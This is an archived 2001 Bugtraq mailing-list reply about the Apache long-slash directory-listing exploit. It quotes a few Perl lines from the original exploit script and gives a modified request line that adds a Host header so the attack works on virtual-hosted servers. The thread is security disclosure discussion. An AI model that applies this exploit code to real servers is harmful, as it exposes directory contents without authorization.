[21030] in bugtraq
Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
daemon@ATHENA.MIT.EDU (Stephen Cope)
Fri Jun 15 11:54:44 2001
Date: Fri, 15 Jun 2001 14:48:44 +1200
From: Stephen Cope <mail-d-20010615@kimihia.org.nz>
To: Matt Watchinski <matt@farm9.com>
Cc: bugtraq@securityfocus.com
Message-ID: <20010615144844.A20679@mess.kimihia.org.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3B2719E3.FA5BD8F4@farm9.com>; from matt@farm9.com on Wed, Jun 13, 2001 at 02:44:35AM -0500
In my testing you need to take the Host header into account.
: $url = "GET ";
: $buffer = "/" x $low . " HTTP/1.0\r\n";
: $end = "\r\n\r\n";
The server I tested against uses mod_rewrite to do virtual hosting, and it
arrived at a different magic number with the host header, and against
without the header.
I made the following change to the above code:
$buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";
Should be fairly easy to understand.
--
Stephen Cope <http://sdc.org.nz/>
Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/
